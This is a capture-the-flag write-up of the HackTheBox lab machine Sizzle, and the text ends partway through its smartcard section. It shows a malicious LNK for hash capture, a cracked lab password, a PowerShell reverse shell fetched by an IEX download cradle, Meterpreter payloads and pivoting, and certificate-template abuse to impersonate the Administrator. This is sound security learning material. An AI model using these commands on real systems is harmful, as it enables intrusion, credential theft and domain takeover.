Sizzle @ hackthebox – Unintended: Getting a Logon Smartcard for the Domain Admin!

My writeup – how to pwn my favorite box on hackthebox.eu, using a (supposedly) unintended path. Sizzle – created by @mrb3n813 and @lkys37en – was the first box on HTB that had my favorite Windows Server Role – the Windows Public Key Infrastructure / Certification Authority.

This CA allows the low-privileged user – amanda – to issue herself a client authentication certificate, which you can then use to start a remote management session with Powershell.

To root Sizzle the (supposedly) intended way, you ‘sizzled’ another user (Kerberoasting), and then abused a special permission granted to that user to use DCSync for stealing the Administrator’s hash. Pass-the-hash gives you an admin shell.

But a loophole in the configuration of the PKI lets you go from amanda to root directly.

Summary – tl;dr: amanda can edit certificate templates and add the Extended Key Usages required for Smartcard Logon. Submitting a certificate request with the Administrator’s name(s) to the CA gives you a credential to impersonate the admin. Importing certificate and key onto a physical card or crypto token lets you use command line tools with the option /smartcard. To make these tools work, you need to join a Windows box to sizzle’s domain and set up a fake DNS server with service records for this domain.

Contents

Initial Enumeration: Spotting the Windows PKI!
Confirming a theory about client certificates, and playing with revocation lists.
Enumerating domain users over Kerberos UDP.
Writing a LNK file to the share, and sniffing amanda’s hash.
Enrolling a client certificate for amanda and starting a PS Session.
Background. The UPN risk. Discovering the misconfiguration of certificate templates.
Considering potential attack vectors: Software certificates versus hardware logon tokens.
Getting a meterpreter shell and routing traffic through it.
Preparing a Certificate Signing Request on behalf of the Administrator.
Editing templates and first attempt of attack setup: msf on Windows!
Editing certificate templates and requesting ‘malicious’ client auth certificates. PSSession Let-Down.
Creating a hardware logon token for impersonating the Administrator
Proxies, fake DNS, and forwarding ports once more with proxychains socat
Joining a Windows client to the htb.local domain
Summary of the solution so far
Finally: Using the Administrator’s token!
Creating a (not really stealthy) backdoor admin

Initial Enumeration: Spotting the Windows PKI!    [>> Contents]

The portscan reveals many open ports – which tells us that Sizzle is a Windows Domain Controller of a domain called htb.local. However, Kerberos TCP 88 is missing – and this will come back to haunt us later :-)
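
A service scan along the lines of the following command produces this kind of output (a sketch – the exact flags used are an assumption):

nmap -sC -sV -p- -oA sizzle 10.10.10.103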

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:41+00:00; +24s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:42+00:00; +24s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:41+00:00; +23s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:42+00:00; +24s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:41+00:00; +23s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
|_ssl-date: 2019-01-13T16:09:41+00:00; +23s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
52562/tcp open  msrpc         Microsoft Windows RPC
52582/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=1/13%Time=5C3B622E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 23s, deviation: 0s, median: 22s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-01-13 17:09:41
|_  start_date: 2019-01-12 20:01:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.39 seconds

The webserver on port 80 only shows an image of sizzling bacon, but port 443 and the TLS certificate immediately have my attention: The CRL (Certificate Revocation List) Distribution Point extension is the tell-tale sign of an Active-Directory-integrated Windows PKI – it points to an object in the configuration container of AD:

There is also an FTP server to which we can log on anonymously – but it does not hold any files, nor can we upload any. I spent a while writing a python tool to fuzz for other FTP folders!

I can enumerate the SMB shares – including some non-default ones – with smbclient:

smbclient -L //10.10.10.103 -N

       Sharename       Type      Comment
       ---------       ----      -------
       ADMIN$          Disk      Remote Admin
       C$              Disk      Default share
       CertEnroll      Disk      Active Directory Certificate Services share
       Department Shares Disk     
       IPC$            IPC       Remote IPC
       NETLOGON        Disk      Logon server share
       Operations      Disk     
       SYSVOL          Disk      Logon server share

Again, there is the signature Windows PKI share – the CertEnroll share, for downloading the CA certificate and revocation lists. The comment gives away the exact name of the server role: Active Directory Certificate Services.

Confirming a theory about client certificates, and playing with revocation lists. [>> Contents]

The Windows CA has an optional web interface – a simple ASP web application – to be found at /certsrv. Accessing it with the browser confirms that it is installed, but as expected (default config) it cannot be accessed anonymously.

So I need credentials of a Windows domain user – then I would be able to enroll for a client certificate. The Windows web server IIS allows for either 1:1 manual mapping of individual certificates or for Active-Directory-based mapping, matching the User Principal Name in the certificate to the user with the same UPN in AD. This will also become important later, for the unintended method.

I want to confirm that I will be able to use a client certificate for something. What web applications are there? Ports 5986 and 5985 stick out – the default ports for WinRM – Windows Remote Management Service.

In order to test WinRM, I forward the relevant ports from Kali Linux to a Windows box:

socat TCP-LISTEN:5985,fork TCP:10.10.10.103:5985 &
socat TCP-LISTEN:5986,fork TCP:10.10.10.103:5986 &

If I want to use client certificates, I’d better also get the validation of the server certificate right first. So I add the host name sizzle.htb.local to the hosts file on Windows, with the IP address of my Kali box; then I need the CA certificate(s).
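
The hosts entry itself is a single line – a sketch, where 192.168.x.y stands for the address under which the Windows box reaches my Kali box:

# C:\Windows\System32\drivers\etc\hosts
192.168.x.y    sizzle.htb.local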

I downloaded the CA certificate by ‘guessing’ the default HTTP download path a Windows CA uses. This is the Issuer Name as displayed in the TLS server certificate:

CN = HTB-SIZZLE-CA
DC = HTB
DC = LOCAL

… so the default HTTP Path to a Windows CA certificate is:

http://sizzle.htb.local/CertEnroll/sizzle.htb.local_HTB-SIZZLE-CA.crt

This URL can, as an option, be added to the certificate extension AIA – Authority Information Access – of issued certificates. Sizzle does not use that option and only has LDAP AIA URLs, so you don’t see the URL in the TLS server certificate. The web URL works nonetheless.

It is a self-signed certificate, so there is only ‘one level’ in this PKI, and I import the certificate to the Trusted Root Certification Authorities cert store on Windows with certmgr.msc. A test of the certificate chain with …

certutil -verify sizzle.htb.local

… fails with a revocation error, as expected. The ‘serverless’ LDAP:/// URL pointing to the CRL objects cannot be used for two reasons: You do not find the actual LDAP server (yet), and you cannot access Active Directory anonymously.

But the CRL file is also there at the default ‘guessed’ URL – the file name being equal to the Common Name on the CA’s certificate:

http://sizzle.htb.local/CertEnroll/HTB-SIZZLE-CA.crl

Certificate revocation checking still fails after importing that file, because the Sizzle CA also uses the default Delta CRLs. The Base CRL hints at the existence of an ‘incremental’ Delta CRL via the extension Freshest CRL:

The Delta CRL is also available at the default HTTP URL:

http://sizzle.htb.local/CertEnroll/HTB-SIZZLE-CA+.crl

Both CRL files can be imported on the Windows box I want to use for the PSSession, using certutil or certmgr.msc:
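
If you prefer the command line over certmgr.msc, certutil can import the CA certificate and both CRLs as well – a minimal sketch, assuming the files keep the names they were downloaded with:

certutil -addstore -user Root sizzle.htb.local_HTB-SIZZLE-CA.crt
certutil -addstore -user Root HTB-SIZZLE-CA.crl
certutil -addstore -user Root HTB-SIZZLE-CA+.crl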

So we are finally ready for the ‘expected error message’, trying to start an unauthenticated session with:

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL

… and we indeed learn that we should use ClientCerts \o/

If you get tired of playing with CRLs (to be re-imported every few days), you can also skip the revocation check directly in Powershell:

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL -SessionOption (New-PSSessionOption -SkipRevocationCheck)

Enumerating domain users over Kerberos UDP. [>> Contents]

I consider brute-forcing the password for a user, so I need to confirm which users actually exist. I mount all SMB shares I can, including the share Department Shares:

mount.cifs '//sizzle/Department Shares' smbfs

Contents of smbfs:

 Accounting      Devops    Infrastructure   Marketing   Tax
 Audit           Finance   IT              'R&D'        Users
 Banking         HR        Legal            Sales       ZZ_ARCHIVE
 CEO_protected   Infosec  'M&A'             Security

The  folder Users contains a bunch of sub-folders:

amanda      bill  chris  joe   lkys37en  mrb3n
amanda_adm  bob   henry  jose  morgan    Public

… from whose names, plus a bunch of default names (such as Administrator or guest), I create a list of potential users – users.txt:

administrator
guest
DefaultAccount
amanda
amanda_adm
bill
bob
chris
henry
joe
jose
lkys37en
morgan
mrb3n

nmap has a script for enumerating users over Kerberos UDP 88. This port is accessible externally, in contrast to TCP 88:

nmap -sU -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=users.txt -vvv 10.10.10.103

I can confirm that guest, amanda and Administrator do exist

PORT   STATE         SERVICE      REASON
88/udp open|filtered kerberos-sec no-response
| krb5-enum-users:
| Discovered Kerberos principals
|     administrator@htb.local
|     amanda@htb.local
|_    guest@htb.local

However, I was not able to brute-force amanda’s password in a reasonable time. I think hydra cannot do an NTLM logon, only Basic Authentication. But the trace of an attempt to log on via the browser shows the NTLM logon:

Writing a LNK file to the share, and sniffing amanda’s hash. [>> Contents]

Having also tried unsuccessfully to brute-force the logon over SMB (with hydra and the metasploit module smb_login), I poke around the shares again. Finally, I realize that I can write to the folder /Users/Public in the share Department Shares.

What if somebody – a simulated amanda user, hopefully – were to ‘look’ at files I write there periodically? So I re-use part of what I did on the box Ethereal, and create a ‘malicious’ shortcut file – a link pointing to my own box.

I used the powershell commands provided in this article to create a simple LNK file:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("test.lnk")
$lnk.TargetPath = "\\10.10.14.21\share"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Hi there"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

I started responder on Kali as my fake file server with

responder -wrf -v -I tun0

… then copy my test.lnk to the folder /Users/Public, and immediately get a callback. I can collect lots of hashes, like this one:

[SMBv2] NTLMv2-SSP Client   : 10.10.10.103
[SMBv2] NTLMv2-SSP Username : HTB\amanda
[SMBv2] NTLMv2-SSP Hash     : amanda::HTB:0ca7982a6e25e95b:4281E64C70D54C315DD06861D421C2D5:0101000000000000C0653150DE09D2013E33784022E5E1CD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000000A1A989A69067922647E05D8B94A1515425B93A3DFC90D4731FD9EBAD8C7C05F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003900000000000000000000000000

The hash can be cracked quickly with hashcat. Checking the list of example hashes shows that we need hash type 5600 for cracking NTLMv2 hashes:

hashcat64.exe -m 5600 _hashes\sizzle-amanda.txt _wordlists\rockyou.txt

Now I have amanda’s password:

Ashare1972

Enrolling a client certificate for amanda and starting a PS Session. [>> Contents]

I can finally log on to the /certsrv web application as amanda. This website lets you either submit a certificate signing request generated with any tool – like openssl, or certreq on Windows – or let the web site trigger the key generation for you. I wanted the certificate as quickly as possible, so I picked the latter method (I am going to show the file-based method in the part about the unintended way).

Socat-ing port 443 to the Windows box, I start Internet Explorer and enter the user HTB\amanda and her password …

Clicking Request a certificate shows the page with the two options:

Advanced certificate request refers to either sending a pre-created CSR or changing certificate attributes. I pick User Certificate, which does a next-next-finish key generation and request submission, pulling all needed attributes from Active Directory:

Clicking Submit may result in an error if the server has not been added to the Intranet Zone in IE’s security settings. After fixing that, I get the ActiveX popup – now a key is generated in my personal certificate store and the request is sent to the Sizzle CA:

OK … waiting for the response … and one more ActiveX popup:

Finally the certificate is ‘installed‘, that is, imported to the personal store and re-united with its key. (Save response gives you the option to also save the BASE64-encoded certificate.)

The certificate is now visible under Personal Certificates in certmgr.msc, or can be checked with certutil:

certutil -store -user my

Relevant part of the output:

...
================ Certificate 8 ================
Serial Number: 6900000016942f3e8913c6b5ec000000000016
Issuer: CN=HTB-SIZZLE-CA, DC=HTB, DC=LOCAL
 NotBefore: 17.01.2019 17:38
 NotAfter: 17.01.2020 17:38
Subject: CN=amanda, CN=Users, DC=HTB, DC=LOCAL
Certificate Template Name (Certificate Type): User
Non-root Certificate
Template: User
Cert Hash(sha1): 04b832d04ec8ae222aa24a80ac064f481d2abc15
  Key Container = {FD89D358-0EA3-49C9-B102-48EFB2C24D5F}
  Unique container name: 1d1f0d178a2e6518c18d17f5d6e8e881_daa0af9e-c489-45ac-9159-1f80602318c7
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Encryption test passed
CertUtil: -store command completed successfully.

The verbose output of certutil

certutil -v -store -user my 04b832d04ec8ae222aa24a80ac064f481d2abc15

… shows (among many other extensions) that this is a multi-purpose certificate for Client Authentication, E-Mail, and Encrypting File System. It also contains amanda’s User Principal Name, which maps the certificate to a user for logon purposes:

...
2.5.29.37: Flags = 0, Length = 22
Enhanced Key Usage
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
Secure Email (1.3.6.1.5.5.7.3.4)
Client Authentication (1.3.6.1.5.5.7.3.2)

2.5.29.17: Flags = 0, Length = 24
Subject Alternative Name
Other Name:
Principal Name=amanda@HTB.LOCAL
...

The sha1 hash is used in the PS command to refer to that certificate, and finally we can logon as amanda!

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL -CertificateThumbprint 04b832d04ec8ae222aa24a80ac064f481d2abc15

… or, if my imported CRLs have expired, using:

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL -SessionOption (New-PSSessionOption -SkipRevocationCheck) -CertificateThumbprint 04b832d04ec8ae222aa24a80ac064f481d2abc15

And I am amanda! \o/

[sizzle.htb.local]: PS C:\Users\amanda\Documents>

The good thing about all certificates created for accessing sizzle: They will also remain valid when the box is reset! The DC validates the certificate path, attributes, dates, and revocation status, but nobody checks whether the certificate is still in the CA’s database!

Background. The UPN risk. Discovering the misconfiguration of certificate templates. [>> Contents]

Certificate templates are LDAP objects whose attributes define what future certificates created from this template will look like, and who can enroll for them. If you can edit all properties of a certificate template or create a new one, you can become whoever you want in a Windows AD forest:

If AD-based mapping is enabled in applications using certificates for logon, User Principal Names in certificates are automatically mapped to the AD user with the corresponding userPrincipalName attribute in the user’s LDAP object. So mapping is based on a string ‘only’. Why is that secure? Because any application using AD for logon also checks whether the CA’s certificate has been imported into a special object in the Public Key Services container (NTAuth). This object can by default only be managed by Enterprise Admins – and so can certificate templates!
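
You can have a look at that store with certutil – NTAuth is the well-known store name, and the -enterprise switch targets the AD-based store:

certutil -viewstore -enterprise NTAuth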

The following templates are available for amanda at (‘published to’) the Sizzle CA, as the dropdown menu in the certsrv application (advanced options, file-based request) shows. I do not want to mess up other hackers’ certificate requests, so I focus on the template for the server – SSL – assuming that everybody else will try to use the templates related to User…. So I check out the permissions on the templates with

certutil -v -dstemplate

That command also runs in the constrained powershell shell. It results in a super detailed list of all attributes of all templates in AD! This is the start of the output for the SSL template – and *yikes*:

Authenticated Users – that is, every user and every computer account in the forest(!) – are able to change that template!

[SSL]
    objectClass = "top", "pKICertificateTemplate"
    cn = "SSL"
    distinguishedName = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL"
    instanceType = "4"
    whenCreated = "20180703180611.0Z" 7/3/2018 1:06 PM
    whenChanged = "20180703180645.0Z" 7/3/2018 1:06 PM

    displayName = "SSL"
    uSNCreated = "16440" 0x4038
    uSNChanged = "16445" 0x403d
    showInAdvancedViewOnly = "TRUE"
    nTSecurityDescriptor = "D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2379389067-1826974543-3574127760-519)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;LA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)"

    Allow Full Control    HTB\Domain Administrators
    Allow Full Control    HTB\Enterprise Admins
    Allow Full Control    HTB\Administrator
    Allow Full Control    NT AUTHORITY\Authenticated Users

So far, this template is only for Server Authentication, but it already has a desired property: Names can be sent in the request, as you would expect for a server certificate:

    name = "SSL"
    objectGUID = "50e0c82d-3a98-4bab-98a0-a8cf58e27c86"
    flags = "131649" 0x20241
    CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
      (CT_FLAG_ADD_EMAIL -- 2)
      (CT_FLAG_ADD_OBJ_GUID -- 4)
      (CT_FLAG_PUBLISH_TO_DS -- 8)
      (CT_FLAG_EXPORTABLE_KEY -- 10 (16))
      (CT_FLAG_AUTO_ENROLLMENT -- 20 (32))
    CT_FLAG_MACHINE_TYPE -- 40 (64)
      (CT_FLAG_IS_CA -- 80 (128))
      (CT_FLAG_ADD_DIRECTORY_PATH -- 100 (256))
    CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
      (CT_FLAG_ADD_SUBJECT_DIRECTORY_PATH -- 400 (1024))
      (CT_FLAG_IS_CROSS_CA -- 800 (2048))
      (CT_FLAG_DONOTPERSISTINDB -- 1000 (4096))
      (CT_FLAG_IS_DEFAULT -- 10000 (65536))
    CT_FLAG_IS_MODIFIED -- 20000 (131072)
      (CT_FLAG_IS_DELETED -- 40000 (262144))
      (CT_FLAG_POLICY_MISMATCH -- 80000 (524288))

If we only had the User template, we would have to set this flag first to allow the ‘enrollee’ to supply a name. With it set, amanda can add any UPN of her liking to a logon certificate, like Administrator@HTB.LOCAL, and the CA will accept it.

The Extended Key Usage will need amendment:

    pKIExtendedKeyUsage = "1.3.6.1.5.5.7.3.1" Server Authentication

Considering potential attack vectors: Software certificates versus hardware logon tokens. [>> Contents]

This could potentially be abused in two ways:

Issue a (software-based) client authentication certificate in the Administrator’s name and use that to enter a PSSession as the admin. This requires adding the UPN and including the EKU Client Authentication – as Powershell checks for that. Spoiler: Certificate issuance does work, but the logon finally does not. Domain Admins are not allowed to use WinRM.

Issue a (software-based) certificate that also includes the Extended Key Usage called Smart Card Logon. Then use Windows command line tools that have the option /smartcard. Candidate commands are:

net use \\sizzle.htb.local\c$ /smartcard

runas /smartcard cmd

The latter should require – or is at least much easier and more straight-forward when you have – a client joined to sizzle’s domain! But that is something that should work for a low-privileged user. Years ago I used to renew a (legit ;-)) smartcard as a member of a domain whose network I hardly ever entered: I regularly joined a test box to this domain over VPN – so I am determined to join a box to HTB.LOCAL now!

But in order to join a box to the domain, log on, or edit templates using the Certificate Templates management console, I need access to all the ports!

Getting a meterpreter shell and routing traffic through it. [>> Contents]

The remote powershell session is limited, as a test of the language mode shows:

[sizzle.htb.local]: PS
C:\Users\amanda\Documents> $ExecutionContext.SessionState.LanguageMode

ConstrainedLanguage

Fortunately version 2 of Powershell is available, so this can be bypassed with

[sizzle.htb.local]: PS C:\Users\amanda\Documents> powershell.exe -version 2 -c 'write-host $ExecutionContext.SessionState.LanguageMode'

FullLanguage

I wanted to get a meterpreter shell to be able to forward ports that are not exposed externally. After zillions of failed attempts to run a payload despite Defender (Ebowla, unicorn…), this was the method that worked reliably for me:

Get a simple ‘nishang’ shell, by running this code …

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.21',8998);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

… from a script on my webserver:

[sizzle.htb.local]: PS C:\Users\amanda\Documents> powershell.exe -version 2 -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.21:81/nishang.ps1')"

I receive the simple shell with metasploit using this handler:

use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.21
set LPORT 8998
exploit -j

Prepare a psh (powershell) payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.21 LPORT=8999 -f psh -o sh.ps1

Start a handler for meterpreter – 2nd stage encoding is crucial, otherwise the shell dies immediately, killed by Defender I guess:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.21
set LPORT 8999
set ExitOnSession false
set EnableStageEncoding true
exploit -j

I run the powershell payload via the msf module, using the simple shell session (1):

use post/windows/manage/powershell/load_script
set SCRIPT sh.ps1
set SESSION 1

… and I now have two sessions. Since I often needed two attempts with msf, I ended up with simple shell session 1 and meterpreter session 3:

msf5 post(windows/manage/powershell/load_script) > sessions

Active sessions
===============

  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         shell x64/windows                             10.10.14.21:8998 -> 10.10.10.103:65378 (10.10.10.103)
  3         meterpreter x64/windows  HTB\amanda @ SIZZLE  10.10.14.21:8999 -> 10.10.10.103:65384 (10.10.10.103)

The benefit of the meterpreter shell is the option to route otherwise inaccessible ports to my Kali box. I set an entry for the to-be-created socks proxy server in my /etc/proxychains.conf:

...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4        127.0.0.1 9050
socks4  127.0.0.1 8088
...

A socks proxy is created as a job in metasploit:

use auxiliary/server/socks4a
set SRVPORT 8088
run

… and I finally route traffic for sizzle through meterpreter session 3:

route add 10.10.10.0 255.255.255.0 3

Preparing a Certificate Signing Request on behalf of the Administrator. [>> Contents]

Certificate templates dictate some of the properties of a certificate, so you only need to add the attributes and extensions to the request that the template does not already enforce. I created all CSRs with the Certificates MMC (certmgr.msc) for the current user.

The request has to include the UPN in the Subject Alternative Name. In case some non-default name-mapping is in place I also make sure the subject name is correct – as cross-checked with the properties of the Administrator user in AD, in amanda’s PSSession:

[sizzle.htb.local]: PS C:\> $users = get-aduser -filter *
[sizzle.htb.local]: PS C:\> $users
DistinguishedName : CN=Administrator,CN=Users,DC=HTB,DC=LOCAL
Enabled           : True
GivenName         :
Name              : Administrator
ObjectClass       : user
ObjectGUID        : fcf33152-0104-4ccb-8db6-3ec7f3549ca8
SamAccountName    : Administrator
SID               : S-1-5-21-2379389067-1826974543-3574127760-500
Surname           :
UserPrincipalName :

Note that the UPN is empty – as it is for all AD users here. Yet amanda’s logon certificate did contain a UPN, so some ‘default name routing’ is in place.

Now craft a custom request, using this information:

Also make sure that the key is exportable and matches the minimum size. The minimum size is displayed in the certutil dump of the template’s properties inspected earlier:

    msPKI-Minimal-Key-Size = "2048" 0x800

For usage on a smartcard, the card’s chip and middleware also need to support that size. I use a ‘legacy’ crypto provider, which does not matter here.

Next – next – finish, save the BASE64 file. Check the contents of the request with certutil to make sure the UPN is included:

certutil Administrator-2018bit.req.txt...
Attribute[3]: 1.2.840.113549.1.9.14 (Certificate Extensions)
Value[3][0], Length = ae
Certificate Extensions: 5
2.5.29.17: Flags = 0, Length = 2b
Subject Alternative Name
    Other Name:
        Principal Name=administrator@htb.local
...
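
As an alternative to clicking through the MMC wizard, an equivalent CSR could be generated with certreq and an INF policy file – a minimal sketch (file names made up; 2.5.29.17 is the OID of the Subject Alternative Name extension):

; admin-csr.inf – process with: certreq -new admin-csr.inf admin-csr.req
[NewRequest]
Subject = "CN=Administrator,CN=Users,DC=HTB,DC=LOCAL"
KeyLength = 2048
Exportable = TRUE
RequestType = PKCS10

[Extensions]
; Subject Alternative Name carrying the Administrator's UPN
2.5.29.17 = "{text}"
_continue_ = "upn=administrator@htb.local"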

Editing templates and first attempt of attack setup: msf on Windows! [>> Contents]

I installed metasploit directly on Windows and repeated all the steps described above. I used a Windows domain controller, because I wanted to forward DNS queries from my DC to sizzle.htb.local, using the Sizzle box as a Conditional Forwarder for the domain htb.local:

It is not sufficient to configure a hosts record for sizzle.htb.local, as the Windows logon requires correct replies to queries for several service – SRV – records. But I cannot configure Sizzle as the primary DNS server for that box – this box also has to maintain the openVPN connection! So my DC forwards requests to Sizzle:
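
For reference: on a Windows DNS server, the same conditional forwarder could also be created with the DnsServer PowerShell module – a sketch, assuming the module is available:

# Forward all queries for htb.local to the Sizzle DC
Add-DnsServerConditionalForwarderZone -Name "htb.local" -MasterServers 10.10.10.103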

C:\hackthebox>nslookup
Default Server:  localhost
Address:  127.0.0.1

> sizzle.htb.local
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    sizzle.htb.local
Addresses:  dead:beef::6d6e:7369:708a:e8a8
          10.10.10.103

After I started the WinRM session on this Windows DC, I could automagically access services on Sizzle via Microsoft Management Consoles, as described here – it seems the externally available RPC/DCOM ports were sufficient. I was also able to use other MMCs, such as Active Directory Users and Computers:

… and the desired Certificate Templates console. I re-targeted my console to Sizzle:

Here is the template SSL we want to abuse:

Editing certificate templates and requesting ‘malicious’ client auth certificates. PSSession Let-Down. [>> Contents]

I just change the Extended Key Usage / Application Policy extensions to also include Client Authentication.

After saving the template, new requests submitted at the /certsrv web application will result in certificates with the updated Extended Key Usages. I am using the ‘advanced’ request option – as no new key is generated but just a file HTTP POSTed, there is no ActiveX control troubleshooting involved:

Note: You could add the UPN ‘again’ in the Attributes field, using the syntax

UPN:administrator@htb.local

But this is only required if the CSR does not yet contain the UPN, and using the form field requires an additional registry flag to be set at the CA. However, re-adding the UPN here does not hurt either…

The certificate is again returned immediately – it shows the intended UPN and these EKUs

Client Authentication (1.3.6.1.5.5.7.3.2)
Server Authentication (1.3.6.1.5.5.7.3.1)

However, logging on to the PSSession fails! It also fails with a certificate for the other Domain Admin, sizzler@htb.local, and it does not help to remove Server Authentication or to spell the domain as HTB.LOCAL. So Domain Admins are not allowed to use WinRM:

So I need to turn to the harder option 2 …

Creating a hardware logon token for impersonating the Administrator [>> Contents]

I have to import the certificate to a USB crypto token (which has the same type of chip as a smartcard)!

First I need to go back to the Certificate Templates console and also add the EKU Smartcard Logon. I also removed Server Authentication (superfluous extensions may or may not break something – it’s all up to the application using the certificate).
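
After that change, the pKIExtendedKeyUsage attribute of the template should look roughly like this (a sketch – 1.3.6.1.4.1.311.20.2.2 is the OID for Smart Card Logon):

    pKIExtendedKeyUsage = "1.3.6.1.5.5.7.3.2" Client Authentication
                          "1.3.6.1.4.1.311.20.2.2" Smart Card Logon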

